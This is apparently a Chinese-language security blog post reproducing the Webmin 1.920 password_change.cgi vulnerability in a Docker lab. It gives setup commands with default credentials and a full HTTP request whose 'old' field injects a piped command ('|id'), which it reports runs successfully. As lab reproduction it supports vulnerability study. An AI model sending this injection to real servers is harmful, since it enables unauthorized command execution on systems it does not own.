0x00 前言
本來前一陣就想復現來着,但是官網的版本已經更新了,直到今天才發現Docker上有環境,才進行了復現
0x01影響版本
Webmin<=1.920
0x02 環境搭建
docker search webmin
docker pull piersonjarvis/webmin-samba
docker run -d -p 10000:80 piersonjarvis/webmin-samba
訪問你的ip:10000即可訪問1.920版本的webmin
使用賬號密碼:root/webmin登錄到后台
開啟密碼重置功能:
Webmin--Webmin confuration--Authentication
0x03 漏洞利用
經過長時間的尋找,未找到修改密碼的接口,所以隨便抓個包手動構造了一個,數據包如下:
POST /password_change.cgi HTTP/1.1 Host: 136.244.xx.xx:10000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://136.244.xx.xx:10000/passwd/index.cgi?xnavigation=1 X-PJAX: true X-PJAX-Container: [data-dcontainer] X-PJAX-URL: passwd/edit_passwd.cgi?user=root X-Requested-From: passwd X-Requested-From-Tab: webmin X-Requested-With: XMLHttpRequest Content-Type: text/plain;charset=UTF-8 Content-Length: 49DNT: 1 Connection: close user=laemon&old=123123|id&new1=123456&new2=123456
最終執行命令成功
參考文章:
https://paper.seebug.org/1019/
更多最新復現內容,請關注公眾號Timeline Sec
歡迎關注公眾號Timeline Sec